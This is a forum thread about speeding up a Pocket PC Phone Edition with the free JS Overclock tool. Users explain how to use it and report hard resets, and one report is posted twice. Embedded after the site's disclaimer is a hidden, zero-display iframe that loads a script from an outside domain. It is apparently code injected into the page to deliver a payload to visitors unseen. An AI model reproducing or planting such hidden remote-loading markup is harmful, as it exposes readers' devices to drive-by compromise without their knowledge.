+ Reply to Thread

Can I speed up the processor on my Pocket PC Phone Edition?

Go to www.jimmysoftware.com and download the free application for ipaq's (I emailed jimmy software directly and they told me the overclock was designed for pocket pc 2002 os - specifically the ipaq - but that it should work just fine on the pocket pc phone) - it is called js overclock. It loads a program called ipaq clock onto your ppcphone, you click on it and can either speed up your system to 236mhz (yes!) or slow it down to like 144mhz. I notice a real difference in application speed. Every time you reset your unit you have to go back in and turn the speed back up as it reverts to the standard 206mhz.

As with all software that messes with your hardware, I am pretty sure it voids your warranty - but we are all so far past voiding our warranties aren't we????

NOTE: Please do your own homework and make sure you are comfortable with the risks of using this program. pdaPhoneHome.com is not responsible for any damage this program may do to your phone.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

JS Overclock file

...after installing this program, where can you go to verify that it has increased your processor speed? I checked my device infor. already, but it still shows 206mhz. I have a PPCPE by with T-Mobile.

thanks,

Rick

Find the IPAQ CLOCK file to speed up the processor...

You need to open the file. Wherever you sent it to when you synced you ppc is where it is. Typically your my documents folder. It is a little icon that is a bomb with a lit fuse called "ipaqclk" or the like. Click on it to open and there will be a slider bar. Move it to the right to speed up, the left to slow down. Then click apply and it is set to that speed. If you ever have to reset your unit, you have to reopen this file and move the slider again as it goes back to the default speed of 206mhz upon any resets. Hope this helps - let me know!

JS Overclock File - hard reset

Both times that I have used this file, my T-mobile PCPC needed a hard reset.

It works great. Until I stop using the PDA - When I return to my work, (first time - after 8 hours, next time 10 minutes) I find that the PDA displaying the Welcome To T-Mobile screen.

(ROM version 3.14)

The best thing I can say is that it was good motivation to learn how to backup/restore my pda!

JS Overclock File - hard reset

Both times that I have used this file, my T-mobile PCPC needed a hard reset.

It works great. Until I stop using the PDA - When I return to my work, (first time - after 8 hours, next time 10 minutes) I find that the PDA displaying the Welcome To T-Mobile screen.

(ROM version 3.14)

The best thing I can say is that it was good motivation to learn how to backup/restore my pda!

my SX56 needed a hard reset both times I tried overclocking with this application.

Unfortunately I would have to advise against using it... it does work for more than a few hours without imploding the PPC...
    Evan M Frank